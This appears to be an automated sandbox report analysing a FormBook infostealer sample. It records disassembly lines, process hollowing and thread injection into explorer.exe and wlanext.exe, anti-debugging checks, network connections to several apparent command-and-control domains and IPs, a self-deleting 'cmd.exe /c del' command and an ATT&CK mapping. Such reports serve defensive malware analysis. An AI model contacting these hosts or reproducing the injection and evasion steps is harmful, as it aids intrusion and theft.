          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03619080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03628794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03648E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0364A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03658EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0363C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03653D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03693540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03637D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0361AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0369A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0362D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_036C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeCode function: 3_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 147.255.129.44 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.143.147.58 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
          Source: C:\Windows\explorer.exeNetwork Connect: 43.132.183.85 80
          Source: C:\Windows\explorer.exeDomain query: www.fulvousemollientplanet.com
          Source: C:\Windows\explorer.exeDomain query: www.rip-online.com
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80
          Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.208 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.scion-go-getter.com
          Source: C:\Windows\explorer.exeDomain query: www.sandman.network
          Source: C:\Windows\explorer.exeDomain query: www.foxandmew.com
          Source: C:\Windows\explorer.exeDomain query: www.royallecleaning.com
          Source: C:\Windows\explorer.exeDomain query: www.websitessample.com
          Source: C:\Windows\explorer.exeDomain query: www.experimentwithoutlimits.com
          Source: C:\Windows\explorer.exeDomain query: www.21yingyang.com
          Source: C:\Windows\explorer.exeDomain query: www.9linefarms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.209.150.94 80
          Source: C:\Windows\explorer.exeDomain query: www.tikomobile.store
          Source: C:\Windows\explorer.exeDomain query: www.texascountrycharts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.242.49 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 910000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeProcess created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
          Source: explorer.exe, 00000005.00000000.679319803.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.695758960.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.666231552.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.682719192.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.701557713.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.673622756.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.686546615.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Users\user\Desktop\1D4l9eR0W4.exe VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\1D4l9eR0W4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532910 Sample: 1D4l9eR0W4 Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 31 www.fourthandwhiteoak.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 6 other signatures 2->45 11 1D4l9eR0W4.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\1D4l9eR0W4.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 15 1D4l9eR0W4.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 texascountrycharts.com 15.197.142.173, 49834, 80 TANDEMUS United States 18->33 35 websitessample.com 198.143.147.58, 49873, 80 SINGLEHOP-LLCUS United States 18->35 37 16 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1D4l9eR0W4.exe26%VirustotalBrowse
